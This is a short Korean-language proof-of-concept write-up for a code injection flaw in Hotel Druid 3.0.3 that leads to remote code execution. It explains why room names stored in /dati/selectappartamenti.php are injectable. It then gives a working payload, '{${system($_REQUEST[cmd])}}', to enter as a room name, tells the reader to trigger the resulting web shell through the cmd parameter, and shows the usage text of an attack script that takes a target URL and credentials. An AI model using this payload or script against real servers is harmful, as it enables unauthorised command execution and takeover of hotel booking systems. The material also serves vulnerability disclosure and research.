
Hotel Druid 3.0.3 코드 인젝션을 통한 원격 코드 실행
Hotel Druid v3.0.3 애플리케이션에서 코드 삽입 취약점이 발견되었습니다. 공격자는 이를 악용하여 서버에서 원격 코드를 실행할 수 있습니다.
성공적으로 악용하려면 공격자가 새 방을 추가할 수 있는 권한이 있어야 합니다.
이 취약점은 방 이름이 /dati/selectappartamenti.php 파일 안에 큰따옴표를 사용하여 저장되기 때문에 발생합니다.
<?php
echo "
<option value=\"Room1\">Room1</option>
<option value=\"Room2\">Room2</option>
<option value=\"Room3\">Room3</option>
";
?>
성공적인 악용을 위해 다음 페이로드를 방 이름으로 사용하여 새 방을 추가하십시오.
{${system($_REQUEST[cmd])}}
새 방을 추가한 후 /dati/selectappartamenti.php로 이동하여 cmd 매개변수를 통해 명령을 전달하여 웹쉘을 트리거하십시오.
usage: hotel-druid.py [-h] -t TARGET [-u USERNAME] [-p PASSWORD] [--noauth]
optional arguments:
-h, --help show this help message and exit
required arguments:
-t TARGET, --target TARGET
Target URL. Example : http://10.20.30.40/path/to/hoteldruid
-u USERNAME, --username USERNAME
Username
-p PASSWORD, --password PASSWORD
password
--noauth If No authentication is required to access the dashboard
애플리케이션에 인증이 없는 경우.
인증 없이 대시보드에 접근하려면 --noauth 플래그를 사용하십시오.

서버에 인증이 활성화된 경우, --username과 --password를 사용하여 인증을 수행하십시오.

연구자 및 PoC 작성자 - 0z09e